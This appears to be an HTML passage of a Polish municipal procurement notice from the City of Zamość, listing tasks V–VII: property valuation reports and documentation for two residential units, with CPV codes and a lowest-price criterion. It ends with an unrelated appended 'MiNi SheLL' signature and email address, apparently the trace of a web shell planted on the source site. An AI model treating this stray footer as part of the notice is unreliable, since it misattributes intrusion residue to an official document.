Wykonanie operatów szacunkowych wartości rynkowej nieruchomości gruntowych, do ustalenia wysokości opłaty rocznej z tytułu użytkowania wieczystego, oznaczonych:
- dz. nr 39/6, o pow. 90 m2, w arkuszu mapy 49, położonej przy ul. Polnej,
- dz. nr 53, o pow. 875 m2, w arkuszu mapy 51, położonej przy na Osiedlu Słoneczny Stok,
- dz. nr 92/3, o pow. 215 m2, w arkuszu mapy 20, położonej przy na Osiedlu Zakole.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR V
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej, stanowiącej własność Miasta Zamość, w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR V
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej, stanowiącej własność Miasta Zamość, w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego

Wykonanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej, stanowiącej własność Miasta Zamość, oznaczonej dz. nr 84/26, o pow. 4377 m2, ark. 38, przy ul. Wspólnej.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR VI
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej przeznaczonej do sprzedaży celem poprawienia warunków zagospodarowania nieruchomości przyległej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR VI
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej przeznaczonej do sprzedaży celem poprawienia warunków zagospodarowania nieruchomości przyległej
Wykonanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej oznaczonej w arkuszu mapy 53, numerem działki 102/2, o pow. 68 m2, położonej przy ul. Wincentego Pola, przeznaczonej do sprzedaży, celem poprawienia warunków zagospodarowania nieruchomości przyległej oznaczonej numerem działki 108/1, o pow.  717 m2.
Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR VII
Opracowanie dokumentacji niezbędnej do uzyskania zaświadczeń o spełnianiu wyma-gań samodzielnych lokali mieszkalnych zgodnie z dyspozycją art. 2 ustawy z dnia 24 czerwca 1994 r. o własności lokali (tekst jedn. Dz. U. z 2000 r. Nr 80, poz. 903 z późn. zm.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR VII
Opracowanie dokumentacji niezbędnej do uzyskania zaświadczeń o spełnianiu wyma-gań samodzielnych lokali mieszkalnych zgodnie z dyspozycją art. 2 ustawy z dnia 24 czerwca 1994 r. o własności lokali (tekst jedn. Dz. U. z 2000 r. Nr 80, poz. 903 z późn. zm.)
Opracowanie dokumentacji dotyczącej lokalu mieszkalnego:
- nr 45, usytuowanego w budynku położonym przy ul. Polnej 7,
- nr 32, usytuowanego w budynku położonym przy ul. Poniatowskiego 15.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com